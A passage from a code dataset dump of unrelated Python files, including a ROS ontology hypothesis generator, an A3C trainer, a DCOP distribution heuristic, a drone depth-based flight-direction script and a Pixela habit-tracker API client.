'ADD'\n req.primary_command_spec = 'IND'\n req.secondary_command_spec = 'CLASS'\n req.args = [instance, class_type]\n msg = armor_service(req)\n res = msg.armor_response\n reasoning()\n disjoint(class_type)\n reasoning()\n #print('%s added to the class %s!' % (instance, class_type))\n \n \n except: \n raise ValueError('Adding of %s in %s failed!' % (instance, class_type))\n\ndef disjoint(class_type):\n try:\n \n req=ArmorDirectiveReq()\n req.client_name= 'tutorial'\n req.reference_name= 'ontoTest'\n req.command= 'DISJOINT'\n req.primary_command_spec= 'IND'\n req.secondary_command_spec= 'CLASS'\n req.args= [class_type]\n msg = armor_service(req)\n \t\t \n except: \n raise ValueError('Failed to disjoint entities in %s class!' % (class_type)) \n\ndef hypotesis_generator(hyp_list):\n\n # Initialize the counter for the hypothesis\n hyp_count = 0\n hyp_string_main = \"HP\"\n # Generate the hypothesis for all the permutations\n for hyp in hyp_list:\n hyp_string = hyp_string_main + str(hyp_count)\n # Get the class of each element and creat an hypothesis\n for element in hyp:\n print(element)\n if element in who_list_full:\n hyp_classes = 'who'\n elif element in where_list_full:\n hyp_classes = 'where'\n else:\n hyp_classes = 'what'\n \n \n try: \n \n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'ADD'\n req.primary_command_spec = 'OBJECTPROP'\n req.secondary_command_spec = 'IND'\n req.args = [hyp_classes, hyp_string, element]\n msg = armor_service(req)\n res = msg.armor_response \n \n print('%s added to the class %s as %s!' % (element, hyp_string, hyp_classes))\n \n except: \n raise ValueError('Adding of %s in %s as %s failed!' % (element, hyp_string, hyp_classes)) \n \n hyp_count += 1\n \n \n \ndef reasoning():\n\n try:\n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'REASON'\n req.primary_command_spec = ''\n req.secondary_command_spec = ''\n req.args= []\n msg = armor_service(req)\n res = msg.armor_response\n \n except: \n raise ValueError('Reasoning failed!')\t \n\n\ndef save_owl():\n\n try:\n req = ArmorDirectiveReq()\n req.client_name = 'tutorial'\n req.reference_name = 'ontoTest'\n req.command = 'SAVE'\n req.primary_command_spec = ''\n req.secondary_command_spec = ''\n req.args= [check_protege]\n msg = armor_service(req)\n res = msg.armor_response\n \n except: \n raise ValueError('Saving ontology failed!')\t\n\ndef main():\n\n global armor_service\n\n # Initialize the node\n rospy.init_node('armor_init') \n \n armor_service = rospy.ServiceProxy('armor_interface_srv', ArmorDirective)\n \n try:\n rospy.wait_for_service('armor_interface_srv', timeout = 5)\n except:\n # The service is not avaialble, trigger the exception\n rospy.signal_shutdown('Timeout has reachede; shutting down the armor_interface_srv cluient')\n sys.exit(1) \n \n # Load the ontology\n load_file(ontology_path)\n \n if room_number < 3:\n raise ValueError('Not enough rooms to find a correct hypothesis.')\n \n elif room_number == 3:\n \tprint(\"Too easy you have only to collect the hints...\")\n \tsolution = solution_creator()\n \t\n \tsolution_upload(solution) \n \t\t\n elif room_number > 9: \n \traise ValueError('Too many rooms in this game!!!') \n \t\t\n else:\n \n # Generate a solution and add the entity in the ontology\n solution = solution_creator()\n solution_upload(solution) \n \n # Initialize the solution space\n solution_space = copy.deepcopy(solution)\n \n print(solution_space)\n \n # Remove the solution elements from their list\n who_list.remove(solution[0])\n where_list.remove(solution[1])\n what_list.remove(solution[2]) \n \n \n # Roll a dice with 3 faces for each remaining rooms and randomly pick elements from the list\n for i in range(3, room_number):\n \n list_id = random.randint(0, 2) \n \n print(list_id)\n if list_id == 0:\n # Extract a new \"who\"\n new_entity = random.choice(who_list)\n class_type = classes[0]\n who_list.remove(new_entity)\n elif list_id == 1:\n # Extract a new \"where\"\n new_entity = random.choice(where_list)\n class_type = classes[1]\n where_list.remove(new_entity)\n elif list_id == 2:\n # Extract a new \"what\"\n new_entity = random.choice(what_list)\n class_type = classes[2]\n what_list.remove(new_entity) \n \n add_entity(new_entity, class_type) \n \n solution_space.append(new_entity)\n \n print(solution_space) \n \n \n # Create all the permutations with the obtained list of entity\n # set and sort are used to remove duplicates\n hypothesis_with_duplicates = itertools.permutations(solution_space, 3)\n sorted_hypothesis = []\n for x in hypothesis_with_duplicates:\n sorted_hypothesis.extend([sorted(list(x))])\n \n hypothesis = list(set(tuple(x) for x in sorted_hypothesis))\n \n # Generate all the hypothesis (INCONSISTENT or CONSISTENT)\n hypotesis_generator(hypothesis)\n \n # Find solution ID\n for ID in range(0, len(hypothesis)):\n if list(hypothesis[ID]) == sorted(solution): \n \tsol_ID = \"HP\" + str(ID) \n print(\"This is another spoil...\") \t \n print(sol_ID) \n rospy.set_param('solution_ID', sol_ID) \n \t\n \t\n # Make knowledge explicit\n reasoning()\t\t\n \n #Save the model to inspect it\n save_owl() \n\n # Wait for ctrl-c to stop the application\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Etruria89/Ontology_Experimental","sub_path":"scripts/armor_init.py","file_name":"armor_init.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43627918256","text":"'''\nGiven two strings s1 and s2. Check if they are anagrams.\nTwo strings are anagrams if they are made up of same characters with same frequencies\nexample:\ns1 = \"danger\"\ns2 = \"garden\"\n'''\n\n# Solution 1: O(n)T | O(n)S\ndef anagram(s1, s2):\n if len(s1) != len(s2):\n return False\n freq1 = {}\n freq2 = {}\n for char in s1:\n if char in freq1:\n freq1[char] +=1\n else:\n freq1[char] = 1\n\n for char in s2:\n if char in freq2:\n freq2[char] +=1\n else:\n freq2[char] = 1\n\n if freq1 == freq2:\n return True\n else:\n return False\n\n# Solutions 2: O(nlogn)T | O(n)S\ndef anagram2(s1, s2):\n if len(s1) != len(s2):\n return False\n if sorted(s1) == sorted(s2):\n return True\n","repo_name":"msp99000/100-Days-of-Code","sub_path":"Anagrams.py","file_name":"Anagrams.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"20001516487","text":"# -*- coding:utf8 -*-\n# File : a3c.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 3/19/17\n# \n# This file is part of TensorArtist.\n\nfrom tartist.core import EnvBox, get_env, get_logger\nfrom tartist.data.rflow.query_pipe import QueryReqPipe, QueryRepPipe\nfrom tartist.nn.graph import reuse_context, Env\nfrom tartist.nn.train import SimpleTrainerEnv, SimpleTrainer\n\nimport queue\nimport threading\n\nlogger = get_logger(__file__)\n\n__all__ = ['A3CMaster', 'A3CTrainerEnv', 'A3CTrainer']\n\n\nclass A3CMaster(object):\n on_data_func = None\n on_stat_func = None\n player_func = None\n predictor_func = None\n\n def __init__(self, env, name, nr_predictors):\n self.name = name\n self.env = env\n self.router = QueryRepPipe(name + '-master', send_qsize=12, mode='tcp')\n self.queue = queue.Queue()\n\n self._nr_predictors = nr_predictors\n self._players = []\n self._predictors = []\n\n def _on_data_func(self, router, identifier, inp_data):\n self.on_data_func(self.env, identifier, inp_data)\n\n def _on_stat_func(self, router, identifier, inp_data):\n if self.on_stat_func:\n self.on_stat_func(self.env, identifier, inp_data)\n\n def _make_predictor_thread(self, i, func, daemon=True):\n return threading.Thread(target=self.predictor_func, daemon=daemon,\n args=(i, self.router, self.queue, func))\n\n def _make_player_proc(self, i, req, daemon=True):\n return EnvBox(target=self.player_func, args=(i, req), daemon=daemon)\n\n def initialize(self):\n self.router.dispatcher.register('data', self._on_data_func)\n self.router.dispatcher.register('stat', self._on_stat_func)\n self.router.initialize()\n\n assert self._nr_predictors == len(self.env.net_funcs)\n\n for i in range(self._nr_predictors):\n func = self.env.net_funcs[i]\n prc = self._make_predictor_thread(i, func, daemon=True)\n self._predictors.append(prc)\n for p in self._predictors:\n p.start()\n\n def start(self, nr_players, name=None, daemon=True):\n name = name or self.name\n self._players = []\n for i in range(nr_players):\n req = QueryReqPipe(name + ('-%d' % i), self.router.conn_info)\n prc = self._make_player_proc(i, req, daemon=daemon)\n self._players.append(prc)\n for p in self._players:\n p.start()\n if not daemon:\n for p in self._players:\n p.join()\n\n def finalize(self):\n self.router.finalize()\n\n\nclass A3CTrainerEnv(SimpleTrainerEnv):\n _player_master = None\n _net_funcs = None\n _inference_player_master = None\n _data_queue = None\n\n owner_trainer = None\n network_maker = None\n\n @property\n def net_funcs(self):\n return self._net_funcs\n\n @property\n def player_master(self):\n return self._player_master\n\n @property\n def inference_player_master(self):\n return self._inference_player_master\n\n @property\n def data_queue(self):\n return self._data_queue\n\n def initialize_a3c(self):\n nr_predictors = get_env('a3c.nr_predictors')\n\n # making net funcs\n self._net_funcs = []\n all_devices = self.slave_devices\n if len(all_devices) == 0:\n all_devices = self.all_devices\n for i in range(nr_predictors):\n dev = all_devices[i % len(all_devices)]\n func = self._make_predictor_net_func(i, dev)\n self._net_funcs.append(func)\n\n self._initialize_a3c_master()\n self._data_queue = queue.Queue(get_env('trainer.batch_size') * get_env('a3c.data_queue_length_factor', 16))\n\n def _initialize_a3c_master(self):\n nr_predictors = get_env('a3c.nr_predictors')\n self._player_master = A3CMaster(self, 'a3c-player', nr_predictors)\n\n self._inference_player_master = A3CMaster(self, 'a3c-inference-player', nr_predictors)\n\n def initialize_all_peers(self):\n nr_players = get_env('a3c.nr_players')\n\n self._player_master.initialize()\n if self._inference_player_master is not None:\n self._inference_player_master.initialize()\n\n # Must call initialize_all_variables before start any players.\n self.initialize_all_variables()\n self._player_master.start(nr_players, daemon=True)\n\n def finalize_all_peers(self):\n self.player_master.finalize()\n if self._inference_player_master is not None:\n self.inference_player_master.finalize()\n\n def _make_predictor_net_func(self, i, dev):\n def prefix_adder(feed_dict):\n for k in list(feed_dict.keys()):\n feed_dict['predictor/{}/{}'.format(i, k)] = feed_dict.pop(k)\n\n outputs_name = get_env('a3c.predictor.outputs_name')\n new_env = Env(master_dev=dev, flags=self.flags.clone(), dpflags=self.dpflags.clone(), sync_with=self)\n with new_env.as_default():\n with new_env.name_scope('predictor/{}'.format(i)), reuse_context(True):\n self.network_maker(new_env)\n outs = {k: new_env.network.outputs[k] for k in outputs_name}\n f = new_env.make_func()\n f.extend_extra_kw_modifiers([prefix_adder])\n if f.queue_enabled:\n f.disable_queue()\n f.compile(outputs=outs)\n return f\n\n\nclass A3CTrainer(SimpleTrainer):\n def initialize(self):\n super().initialize()\n self.env.network_maker = self.desc.make_network\n self.env.owner_trainer = self\n self.env.initialize_a3c()\n self.desc.make_a3c_configs(self.env)\n self.env.initialize_all_peers()\n\n def finalize(self):\n self.env.finalize_all_peers()\n super().finalize()\n","repo_name":"vacancy/TensorArtist","sub_path":"tartist/app/rl/train/a3c.py","file_name":"a3c.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"99"} +{"seq_id":"17824760379","text":"import logging\nfrom typing import Iterable, Callable, List, Dict, Tuple\n\nfrom collections import defaultdict\n\nfrom pydcop.computations_graph.objects import ComputationGraph, ComputationNode\nfrom pydcop.dcop.objects import AgentDef\nfrom pydcop.distribution import ilp_compref\nfrom pydcop.distribution.objects import DistributionHints, Distribution\n\nlogger = logging.getLogger('distribution.heur_comhost')\n\n\n# Weight factors when aggregating communication costs and hosting costs in the\n# objective function.\n# the global objective is built as Comm_cost * RATIO + Hosting_cost * (1-RATIO)\nRATIO_HOST_COMM = 0.5\n\n\ndef distribute(computation_graph: ComputationGraph,\n agentsdef: Iterable[AgentDef],\n hints: DistributionHints=None,\n computation_memory: Callable[[ComputationNode], float]=None,\n communication_load: Callable[[ComputationNode, str],\n float]=None) \\\n -> Distribution:\n \"\"\"\n\n Parameters\n ----------\n computation_graph\n agentsdef\n hints\n computation_memory\n communication_load\n\n Returns\n -------\n\n \"\"\"\n computations = sorted([(computation_memory(n), n, None)\n for n in computation_graph.nodes],\n key=lambda o: (o[0], o[1].name),\n reverse=True)\n logger.info('placing computations %s',\n [(f, c.name) for f, c, _ in computations])\n\n current_mapping = {} # Type: Dict[str, str]\n i = 0\n while len(current_mapping) != len(computations):\n footprint, computation, candidates = computations[i]\n logger.debug('Trying to place computation %s with footprint %s',\n computation.name, footprint)\n # try\n # look for agent for computation c\n if candidates is None:\n candidates = candidate_hosts(computation, footprint,\n computations, agentsdef,\n communication_load, current_mapping)\n computations[i] = footprint, computation, candidates\n logger.debug('Candidates for computation %s : %s',\n computation.name, candidates )\n\n if not candidates:\n if i==0:\n raise ValueError('Impossible Distribution !')\n\n # no candidate : backtrack !\n i -= 1\n logger.info('No candidate for %s, backtrack placement '\n 'of computation %s (was on %s',\n computation.name, computations[i][1].name,\n current_mapping[computations[i][1].name])\n current_mapping.pop(computations[i][1].name)\n\n # FIXME : eliminate selected agent for previous computation\n else:\n _, selected = candidates.pop()\n current_mapping[computation.name] = selected.name\n computations[i] = footprint, computation, candidates\n logger.debug('Place computation %s on agent %s', computation.name,\n selected.name)\n i += 1\n\n # Build the distribution for the mapping\n agt_mapping = defaultdict(lambda: [])\n for c, a in current_mapping.items():\n agt_mapping[a].append(c)\n dist = Distribution(agt_mapping)\n\n return dist\n\n\ndef distribution_cost(distribution: Distribution,\n computation_graph: ComputationGraph,\n agentsdef: Iterable[AgentDef],\n computation_memory: Callable[[ComputationNode], float],\n communication_load: Callable[[ComputationNode, str],\n float]) -> float:\n return ilp_compref.distribution_cost(\n distribution, computation_graph, agentsdef,\n computation_memory, communication_load)\n\n\ndef candidate_hosts(computation: ComputationNode, footprint: float,\n computations: List[Tuple],\n agents: Iterable[AgentDef],\n communication_load: Callable[[ComputationNode, str], float],\n mapping: Dict[str, str]):\n candidates = []\n for agt in agents:\n # Compute remaining capacity for agt, to check if it as enough place\n # left. Only keep agents that have enough capacity.\n capa = agt.capacity\n for c, a in mapping.items():\n if a == agt.name:\n c_footprint = next(f for f, comp, _ in computations\n if comp.name == c)\n capa -= c_footprint\n if capa < footprint:\n continue\n\n # compute cost of assigning computation to agt\n hosting_cost = agt.hosting_cost(computation.name)\n comm_cost = 0\n for l in computation.links:\n for n in l.nodes:\n if n in mapping:\n comm_cost += communication_load(computation, n) \\\n * agt.route(mapping[n])\n cost = RATIO_HOST_COMM * comm_cost + (1-RATIO_HOST_COMM) *hosting_cost\n candidates.append((cost, agt))\n\n candidates.sort(key=lambda o: (o[0], o[1].name), reverse=True)\n return candidates\n","repo_name":"bubu42/Multi_agent_system","sub_path":"venv/lib/python3.7/site-packages/pydcop/distribution/heur_comhost.py","file_name":"heur_comhost.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7335613832","text":"import shapefile\nfrom pandas import *\nimport numpy as np\nimport netCDF4\nfrom pyproj import Proj\nfrom shapely.geometry import Point, Polygon\nimport sys\nnc = netCDF4.Dataset('template_d4.nc', 'r')\nLatitude_Pole, Longitude_Pole = nc.YCENT, nc.XCENT\npnyc = Proj(proj='lcc', datum='NAD83', lat_1=10, lat_2=40,\n lat_0=Latitude_Pole, lon_0=Longitude_Pole, x_0=0, y_0=0.0)\nRESm=1000.\n\nV=[list(filter(lambda x:nc.variables[x].ndim==j, [i for i in nc.variables])) for j in [1,2,3,4]]\nnt,nlay,nrow,ncol=(nc.variables[V[3][0]].shape[i] for i in range(4))\nxmin=nc.XORIG\nymin=nc.YORIG\nxmax=nc.XORIG+(ncol+1)*nc.XCELL\nymax=nc.YORIG+(nrow+1)*nc.YCELL\nncol2=int((xmax-xmin)//RESm)\nnrow2=int((ymax-ymin)//RESm)\nX=[xmin+RESm*(i+0.5) for i in range(ncol2)]\nY=[ymin+RESm*(i+0.5) for i in range(nrow2)]\nx_g, y_g = np.meshgrid(X, Y)\nPlon, Plat= pnyc(x_g,y_g, inverse=True)\n\n\nshp='TOWN_MOI_1090727.shp'\nshape = shapefile.Reader(shp)\nf=shape.fields\nrec=shape.records()\ncol=[i[0] for i in f[1:]]\ndf=DataFrame({col[ic]:[rec[i][ic] for i in range(len(rec))] for ic in range(7)})\ndf.to_csv('record.csv')\n\nplgs,multi=[],[]\nfor i in range(len(df)):\n tp=shape.shapeRecords()[i].shape.__geo_interface__['type']\n cr=shape.shapeRecords()[i].shape.__geo_interface__['coordinates']\n if len(cr)!=1:\n multi.append(i)\n if type(cr[0][0][0])==tuple:\n plg=[cr[ic][0][:] for ic in range(len(cr))] \n else:\n plg=[cr[ic][:] for ic in range(len(cr))] \n plgs.append(plg)\n else:\n plgs.append(cr[0])\n[Dplg,mxLon,mnLon,mxLat,mnLat]=[[] for i in range(5)]\nfor plg in plgs:\n lon=[i[0] for i in plg[:]]\n lat=[i[1] for i in plg[:]]\n crd=[(i,j) for i,j in zip(lat,lon)]\n Dplg.append(crd)\n mxLon.append(np.max(lon))\n mnLon.append(np.min(lon))\n mxLat.append(np.max(lat))\n mnLat.append(np.min(lat))\nnplgs=len(df)\nDIS=np.zeros(shape=(nrow2,ncol2))\nfor i in 'mxLon,mnLon,mxLat,mnLat'.split(','):\n exec(i+'=np.array('+i+')')\nfor j in range(nrow2):\n for i in range(ncol2):\n p1=Point((Plat[j,i],Plon[j,i]))\n idx=np.where((Plat[j,i]-mnLat)*(Plat[j,i]-mxLat)<=0)\n if len(idx[0])==0: continue\n idx2=np.where((Plon[j,i]-mnLon[idx[0][:]])*(Plon[j,i]-mxLon[idx[0][:]])<=0)\n if len(idx2[0])==0: continue\n for n in list(idx[0][idx2[0]]): #loop for each polygons\n if n in multi:continue\n poly = Polygon(Dplg[n])\n if p1.within(poly): #boolean to check whether the p1 coordinates is inside the polygon or not\n DIS[j,i]=float(n)\n break\nfor n in multi:\n idx=np.where((Plat-mnLat[n])*(Plat-mxLat[n])<=0)\n idx2=np.where((Plon[idx[0][:],idx[1][:]]-mnLon[n])*(Plon[idx[0][:],idx[1][:]]-mxLon[n])<=0)\n cr=shape.shapeRecords()[n].shape.__geo_interface__['coordinates']\n if type(cr[0][0][0])==tuple:\n plgs=[cr[ic][0][:] for ic in range(len(cr))] \n else:\n plgs=[cr[ic][:] for ic in range(len(cr))] \n for plg in plgs:\n lon=[i[0] for i in plg[:]]\n lat=[i[1] for i in plg[:]]\n crd=[(ii,jj) for ii,jj in zip(lat,lon)]\n for ij in range(len(idx2[0])):\n j=idx[0][idx2[0][ij]]\n i=idx[1][idx2[0][ij]]\n p1=Point((Plat[j,i],Plon[j,i]))\n poly = Polygon(crd)\n if p1.within(poly): #boolean to check whether the p1 coordinates is inside the polygon or not\n DIS[j,i]=float(n)\n\n#ncks -O --mk_rec_dmn ROW template_d4_1x1.nc a.nc\n#ncks -O --mk_rec_dmn COL b.nc c.nc\n#ncks -O -v NO,TFLAG -d TSTEP,0 c.nc template_d4_1x1.nc\n#ncrename -v NO,NUM_TOWN $nc\nnc = netCDF4.Dataset('template_d4_1x1.nc', 'r+')\nV=[list(filter(lambda x:nc.variables[x].ndim==j, [i for i in nc.variables])) for j in [1,2,3,4]]\nnt,nlay,nrow,ncol=(nc.variables[V[3][0]].shape[i] for i in range(4))\nnc.NCOLS=ncol2\nnc.NROWS=nrow2\nnc.NVARS=1\nnc.NSTEPS=1\nnc.XCELL=RESm\nnc.YCELL=RESm\nif nrow!=nrow2 or ncol!=ncol2:\n for j in range(nrow2):\n for i in range(ncol2):\n nc.variables['NUM_TOWN'][0,0,j,i]=DIS[j,i]\nelse:\n nc.variables['NUM_TOWN'][0,0,:nrow,:ncol]=DIS[:,:]\nnc.close()\t\n","repo_name":"sinotec2/cmaq_relatives","sub_path":"land/gridmask/withinD5.py","file_name":"withinD5.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"18649162054","text":"import matplotlib\nmatplotlib.use(\"AGG\")\n\nexecfile(\"config.py\")\n\nimport simparams\nimport measfct\n\n\nncpu = 1\n\n\nsp = simparams.GauShear1()\n\n\"\"\"\nmegalut.sim.run.multi(\n\tsimdir=workdir,\n\tsimparams=sp,\n\tdrawcatkwargs={\"n\":1000, \"nc\":50, \"stampsize\":128},\n\tdrawimgkwargs={}, \n\tpsfcat=None, psfselect=\"random\",\n\tncat=1, nrea=1, ncpu=ncpu,\n\tsavepsfimg=False, savetrugalimg=False\n\t)\n\"\"\"\n\nmegalut.meas.run.onsims(\n\tsimdir=workdir,\n\tsimparams=sp,\n\tmeasdir=workdir,\n\tmeasfct=measfct.default,\n\tmeasfctkwargs={\"stampsize\":128},\n\tncpu=ncpu,\n\tskipdone=False\n\t)\n\n\"\"\"\n\ncat = megalut.meas.avg.onsims(\n\tmeasdir=workdir, \n\tsimparams=sp,\n\ttask=\"group\",\n\tgroupcols=measfct.default_groupcols, \n\tremovecols=measfct.default_removecols\n\t)\n\nmegalut.tools.table.keepunique(cat)\nmegalut.tools.io.writepickle(cat, os.path.join(workdir, sp.name, \"groupmeascat.pkl\"))\n\"\"\"\n\n\n","repo_name":"megalut/megalut","sub_path":"runs/malte/meastest/run_sim.py","file_name":"run_sim.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"13636037709","text":"import cv2\nimport multiprocessing\nimport numpy as np\nfrom multiprocessing import Pool\n\n# write the final side by side image for flight travel\ndef create_flight_direction_output(video_name, original_image, depth_image, output_path, flight_path):\n # take the depth image and draw the flight_path arrow onto it\n depth_with_arrow_path = cv2.arrowedLine(depth_image, (788, 246), (int(flight_path[0]), int(flight_path[1])), (255,255,255), 3)\n # resize the depth image to be the same as the original video frame (1920x1080)\n resized_final_depth_flight = cv2.resize(depth_with_arrow_path, (1920, 1080), interpolation = cv2.INTER_AREA)\n # create comparison images -- original on top, depth with flight path on the bottom\n stacked_final_result = np.concatenate((original_image, resized_final_depth_flight), axis=0)\n cv2.imwrite(output_path, stacked_final_result)\n\n return stacked_final_result\n\n# take deepest path and calculate the endpoint of the arrow to be drawn\ndef calculate_flight_direction(deepest_zone_coordinates):\n top_left = deepest_zone_coordinates[0]\n bottom_right = deepest_zone_coordinates[1]\n # we want to go to the center of the zone\n # this could be tweaked later to be more precise, not sure if we want to be that precise though\n # it might cause jerking in the flight so we will keep it to the zoning\n # **we probably could make something more sophisticated leveraging zones and then smoothing of the depth intensities\n # i think that goes past what this project is meant to do though\n center_x = (top_left[0] + bottom_right[0]) / 2\n center_y = (top_left[1] + bottom_right[1]) / 2\n return center_x, center_y\n\ndef calculate_deepest_point(image):\n # we have a 1576x492 image \n # we are going to break it down into a grid of 12 rows and 8 columns\n # we will use the idea of a kernel of 197x41 (width x height) to look at each of our zones\n # we will find out the average zone depth per region\n # we will try to find a zone closest to the center of the image before deciding a far-away zone is the deepest\n # we then take the center point of the image\n height = 492\n width = 1576\n kernel_height = 41 # 41\n kernel_width = 197 # 197\n kernel_rows = int(height/kernel_height) # 12\n kernel_columns = int(width/kernel_width) # 8\n\n # get the grayscale of the image\n # most deep == most dark == closest to 0\n image_grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # these will be for tracking the deepest point as we go through the image\n deepest_zone_average = 255\n deepest_zone_row = 0\n deepest_zone_column = 0\n for r in range(kernel_rows - 2): # (0-9) -- removing the bottom two rows since the heatmap is skewed\n for c in range(kernel_columns): # (0-7)\n starting_row = r*kernel_height\n starting_column = c*kernel_width\n running_total = 0\n for k_r in range(kernel_height):\n for k_c in range(kernel_width):\n running_total += image_grayscale[starting_row + k_r][starting_column + k_c]\n kernel_average = running_total / (kernel_height*kernel_width)\n # we need to favor the center of the picture much more than the perimetet\n # we will take the zones from a rectangle in the center and decrease them by 50%\n # but other zones will stay as is\n if r > 1 and r < 8 and c > 1 and c < 6:\n kernel_average *= .5\n if (kernel_average < deepest_zone_average):\n deepest_zone_average = kernel_average\n deepest_zone_row = r\n deepest_zone_column = c\n \n # find the spot in the matrix that is the deepest zone\n top_left = [deepest_zone_column*kernel_width, deepest_zone_row*kernel_height]\n bottom_right = [(deepest_zone_column+1)*kernel_width, (deepest_zone_row+1)*kernel_height]\n\n return calculate_flight_direction([top_left, bottom_right])\n\ndef process_depth_calculations(video_name):\n datasets_folder = \"datasets/\"\n video_file = datasets_folder + video_name + \".mp4\"\n # reading the video\n capture = cv2.VideoCapture(video_file)\n frame_count = 0\n final_output_frames = []\n while capture.isOpened():\n # video frame -- original image\n ret, original_image = capture.read()\n depth_image = cv2.imread(datasets_folder + video_name + \"/\" + str(frame_count) + \".png\")\n\n # if there are no more depth images then we stop\n if type(depth_image) == type(None):\n break\n\n # build the output path\n output_path = datasets_folder + video_name + \"/final_comparison_\" + str(frame_count) + \".png\"\n\n # deepest point\n deepest_x, deepest_y = calculate_deepest_point(depth_image)\n\n # create final output\n result = create_flight_direction_output(video_name, original_image, depth_image, output_path, [deepest_x, deepest_y])\n final_output_frames.append(result)\n frame_count += 1\n # create a video of final output files\n final_video_name = datasets_folder + video_name + \"/final_comparison_\" + video_name + \".mp4\"\n final_video = cv2.VideoWriter(final_video_name, cv2.VideoWriter_fourcc('m', 'p', '4', 'v'), 30, (1920, 2160))\n for i in range(len(final_output_frames)):\n final_video.write(final_output_frames[i])\n final_video.release()\n\n\nif __name__ == \"__main__\":\n input_videos = [\"good_path\", \"floor\", \"right_wall\"]\n \n # multiprocessing of the videos - calulating the Deepest Zones and creating the output images\n pool = multiprocessing.Pool(3)\n zip(pool.map(process_depth_calculations, input_videos))","repo_name":"richard-frink/drone-piloting-with-wavelet-monodepth","sub_path":"flight_path_creator.py","file_name":"flight_path_creator.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73145669764","text":"from __future__ import print_function\nfrom builtins import zip\nimport stabilipy as stab\nimport numpy as np\nimport sys\n\nfrom unilateral_contacts import pos, normals\n\nimport matplotlib.pyplot as plt\n\nazim = 48.9035087719\nelev = 31.5350877193\nxlim = [-0.95389899, 0.95389899]\nylim = [-0.95389899, 0.95389899]\nzlim = [-0.95389899, 0.95389899]\n\ndef main(margin):\n mu = 0.5\n contacts = [stab.Contact(mu, p, n) for p, n in zip(pos, normals)]\n\n contacts[2].mu = 0.5\n\n polyhedron = stab.StabilityPolygon(200, dimension=3, radius=1.5, robust_sphere=False)\n polyhedron.contacts = contacts\n\n polygon = stab.StabilityPolygon(200, dimension=2, radius=1.5)\n polygon.contacts = contacts\n\n shape = [\n np.array([[-1., 0, 0]]).T,\n np.array([[1., 0, 0]]).T,\n np.array([[0, 1., 0]]).T,\n np.array([[0, -1., 0]]).T,\n np.array([[0, 0., 1]]).T,\n np.array([[0, 0., -1]]).T\n ]\n\n polytope = [margin*s for s in shape]\n\n polyhedron.gravity_envelope = polytope\n polyhedron.compute(stab.Mode.iteration, epsilon=2e-3, maxIter=10, solver='qhull',\n record_anim=False, plot_init=False,\n plot_step=False, plot_final=True)\n #polyhedron.reset_fig()\n #polyhedron.ax.set_xlabel(\"x(m)\")\n #polyhedron.ax.set_ylabel(\"y(m)\")\n #polyhedron.ax.set_zlabel(\"z(m)\")\n #polyhedron.ax.view_init(elev=elev, azim=azim)\n #polyhedron.ax.set_xlim3d(*xlim)\n #polyhedron.ax.set_ylim3d(*ylim)\n #polyhedron.ax.set_zlim3d(*zlim)\n #polyhedron.plot_contacts()\n #polyhedron.plot_solution()\n #polyhedron.plot_polyhedrons()\n #polyhedron.show()\n\n #plt.savefig('{}.png'.format(margin))\n\n #polygon.gravity_envelope = polytope\n #polygon.compute(stab.Mode.best, epsilon=2e-3, maxIter=20, solver='parma',\n # record_anim=False, plot_init=False,\n # plot_step=False, plot_final=False)\n\n #print polyhedron.volume_convex(polyhedron.inner)\n #print 3*polygon.volume_convex(polygon.inner)\n\nprint(\"Margin : {}\".format(sys.argv[1]))\n\nmain(float(sys.argv[1]))\n","repo_name":"haudren/stabilipy","sub_path":"examples/unilateral_example.py","file_name":"unilateral_example.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"25616598277","text":"import requests\nimport datetime as dt\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(\".env\")\n\nURL = config[\"URL\"]\nGRAPH = config[\"GRAPH\"]\nTOKEN = config[\"TOKEN\"]\nUSER = config[\"USER\"]\nG_ID= config[\"G_ID\"]\n\n#1 create USER\n\nreq = {\n \"token\": TOKEN,\n \"username\": USER,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\",\n}\n#\n# data = requests.post(URL, json=req)\n\n#2 create graph\n\nhead = {\n \"X-USER-TOKEN\": TOKEN\n}\nreq_graph = {\n \"id\": G_ID,\n \"name\": \"ambition\",\n \"unit\": \"effort\",\n \"type\": \"int\",\n \"color\": \"ajisai\",\n}\n\n# data = requests.post(url=f\"{URL}/{USER}/graphs\", json=req_graph, headers=head)\n# print(data.text)\n\n#3 PUSH PIXEL\ntoday = dt.datetime.now()\ntoday = today.strftime(\"%Y%m%d\")\npixel_insert = {\n \"date\": today,\n \"quantity\": \"10\"\n}\n# data = requests.post(f\"{URL}/{USER}/graphs/{G_ID}\", json=pixel_insert, headers=head)\n# print(data.text)\n\n#4 update a pixel\npixel_update = {\n \"quantity\": \"15\"\n}\ndata = requests.put(f\"{URL}/{USER}/graphs/{G_ID}/{today}\", json=pixel_update, headers=head)\nprint(data.text)\n\n#5 DELETE PIXEL\n# data = requests.delete(f\"{URL}/{USER}/graphs/{G_ID}/{today}\", headers=head)\n# 